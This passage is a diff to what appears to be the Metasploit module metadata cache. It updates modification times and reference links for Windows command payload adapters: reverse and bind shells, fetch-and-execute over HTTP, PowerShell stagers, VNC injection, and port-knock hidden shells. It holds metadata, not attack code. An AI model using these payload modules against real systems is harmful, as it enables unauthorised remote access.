"arch": "cmd",
@@ -190370,7 +193473,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/peinject/bind_ipv6_tcp_uuid",
@@ -190404,7 +193507,7 @@
],
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for a pipe connection (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -190412,7 +193515,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/peinject/bind_named_pipe",
@@ -190446,7 +193549,7 @@
],
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for a connection (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -190454,7 +193557,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/peinject/bind_tcp",
@@ -190493,7 +193596,7 @@
],
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -190501,7 +193604,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/peinject/bind_tcp_rc4",
@@ -190536,7 +193639,7 @@
],
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for a connection with UUID Support (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -190544,7 +193647,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/peinject/bind_tcp_uuid",
@@ -190578,7 +193681,7 @@
],
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker via a named pipe pivot",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -190586,7 +193689,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/peinject/reverse_named_pipe",
@@ -190620,7 +193723,7 @@
],
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -190628,7 +193731,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/peinject/reverse_tcp",
@@ -190667,7 +193770,7 @@
],
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -190675,7 +193778,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/peinject/reverse_tcp_rc4",
@@ -190710,7 +193813,7 @@
],
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker with UUID Support (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -190718,7 +193821,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/peinject/reverse_tcp_uuid",
@@ -190759,7 +193862,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/pingback_reverse_tcp",
@@ -190800,7 +193903,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/powershell_bind_tcp",
@@ -190841,7 +193944,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/powershell_reverse_tcp",
@@ -190882,7 +193985,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/powershell_reverse_tcp_ssl",
@@ -190921,7 +194024,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/shell/bind_ipv6_tcp",
@@ -190963,7 +194066,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/shell/bind_ipv6_tcp_uuid",
@@ -191005,7 +194108,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/shell/bind_named_pipe",
@@ -191046,7 +194149,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/shell/bind_tcp",
@@ -191092,7 +194195,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/shell/bind_tcp_rc4",
@@ -191134,7 +194237,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/shell/bind_tcp_uuid",
@@ -191175,7 +194278,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/shell/reverse_tcp",
@@ -191221,7 +194324,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/shell/reverse_tcp_rc4",
@@ -191263,7 +194366,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/shell/reverse_tcp_uuid",
@@ -191304,7 +194407,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/shell_bind_tcp",
@@ -191343,7 +194446,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/shell_reverse_tcp",
@@ -191383,7 +194486,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/vncinject/bind_ipv6_tcp",
@@ -191426,7 +194529,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/vncinject/bind_ipv6_tcp_uuid",
@@ -191469,7 +194572,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/vncinject/bind_named_pipe",
@@ -191511,7 +194614,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/vncinject/bind_tcp",
@@ -191558,7 +194661,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/vncinject/bind_tcp_rc4",
@@ -191601,7 +194704,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/vncinject/bind_tcp_uuid",
@@ -191644,7 +194747,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/vncinject/reverse_http",
@@ -191689,7 +194792,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/vncinject/reverse_https",
@@ -191731,7 +194834,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/vncinject/reverse_tcp",
@@ -191778,7 +194881,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/vncinject/reverse_tcp_rc4",
@@ -191821,7 +194924,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/vncinject/reverse_tcp_uuid",
@@ -191864,7 +194967,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/vncinject/reverse_winhttp",
@@ -191907,7 +195010,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/vncinject/reverse_winhttps",
@@ -193619,7 +196722,7 @@
],
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for an IPv6 connection (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -193662,7 +196765,7 @@
],
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -193704,7 +196807,7 @@
],
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for a pipe connection (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -193746,7 +196849,7 @@
],
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for a connection (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -193793,7 +196896,7 @@
],
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -193836,7 +196939,7 @@
],
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for a connection with UUID Support (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -193878,7 +196981,7 @@
],
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker via a named pipe pivot",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -193920,7 +197023,7 @@
],
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -193967,7 +197070,7 @@
],
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -194010,7 +197113,7 @@
],
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker with UUID Support (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -195325,7 +198428,7 @@
],
"description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
"references": [
"URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
],
"platform": "Windows",
"arch": "cmd",
@@ -195370,7 +198473,7 @@
],
"description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
"references": [
"URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
],
"platform": "Windows",
"arch": "cmd",
@@ -196543,7 +199646,8 @@
"description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
"URL-https://github.com/rapid7/ReflectiveDLLInjection",
"URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
],
"platform": "Windows",
"arch": "cmd",
@@ -196588,7 +199692,8 @@
"description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
"URL-https://github.com/rapid7/ReflectiveDLLInjection",
"URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
],
"platform": "Windows",
"arch": "cmd",
@@ -197880,7 +200985,8 @@
"description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
"URL-https://github.com/rapid7/ReflectiveDLLInjection",
"URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
],
"platform": "Windows",
"arch": "cmd",
@@ -197926,7 +201032,8 @@
"description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
"URL-https://github.com/rapid7/ReflectiveDLLInjection",
"URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
],
"platform": "Windows",
"arch": "cmd",
@@ -199185,7 +202292,7 @@
],
"description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
"references": [
"URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
],
"platform": "Windows",
"arch": "cmd",
@@ -199230,7 +202337,7 @@
],
"description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
"references": [
"URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
],
"platform": "Windows",
"arch": "cmd",
@@ -200025,7 +203132,7 @@
],
"description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
"references": [
"URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
],
"platform": "Windows",
"arch": "cmd",
@@ -200070,7 +203177,7 @@
],
"description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
"references": [
"URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
],
"platform": "Windows",
"arch": "cmd",
@@ -200865,7 +203972,8 @@
],
"description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
"references": [
"URL-https://github.com/EgeBalci/Amber",
"URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
],
"platform": "Windows",
"arch": "cmd",
@@ -200910,7 +204018,8 @@
],
"description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
"references": [
"URL-https://github.com/EgeBalci/Amber",
"URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
],
"platform": "Windows",
"arch": "cmd",
@@ -200954,7 +204063,7 @@
],
"description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -200999,7 +204108,7 @@
],
"description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -201041,7 +204150,7 @@
],
"description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -201083,7 +204192,7 @@
],
"description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -201127,7 +204236,7 @@
],
"description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -201173,7 +204282,7 @@
],
"description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -201216,7 +204325,7 @@
],
"description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -201258,7 +204367,7 @@
],
"description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -201302,7 +204411,7 @@
],
"description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -201344,7 +204453,7 @@
],
"description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker via a named pipe pivot",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -201386,7 +204495,7 @@
],
"description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -201428,7 +204537,7 @@
],
"description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -201472,7 +204581,7 @@
],
"description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -201516,7 +204625,7 @@
],
"description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -201561,7 +204670,7 @@
],
"description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -201607,7 +204716,7 @@
],
"description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -201653,7 +204762,7 @@
],
"description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -201696,7 +204805,7 @@
],
"description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -201945,7 +205054,7 @@
],
"description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
"references": [
"URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
],
"platform": "Windows",
"arch": "cmd",
@@ -201990,7 +205099,7 @@
],
"description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
"references": [
"URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
],
"platform": "Windows",
"arch": "cmd",
@@ -202905,7 +206014,7 @@
],
"description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from certain IP and spawn a command shell.\nThe shellcode will reply with a RST packet if the connections is not\ncoming from the IP defined in AHOST. This way the port will appear\nas \"closed\" helping us to hide the shellcode.",
"references": [
"URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
],
"platform": "Windows",
"arch": "cmd",
@@ -203027,7 +206136,7 @@
],
"description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
"references": [
"URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
],
"platform": "Windows",
"arch": "cmd",
@@ -203072,7 +206181,7 @@
],
"description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
"references": [
"URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
],
"platform": "Windows",
"arch": "cmd",
@@ -203909,7 +207018,8 @@
"description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
"URL-https://github.com/rapid7/ReflectiveDLLInjection",
"URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
],
"platform": "Windows",
"arch": "cmd",
@@ -203954,7 +207064,8 @@
"description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
"URL-https://github.com/rapid7/ReflectiveDLLInjection",
"URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
],
"platform": "Windows",
"arch": "cmd",
@@ -206313,7 +209424,7 @@
],
"description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -206356,7 +209467,7 @@
],
"description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
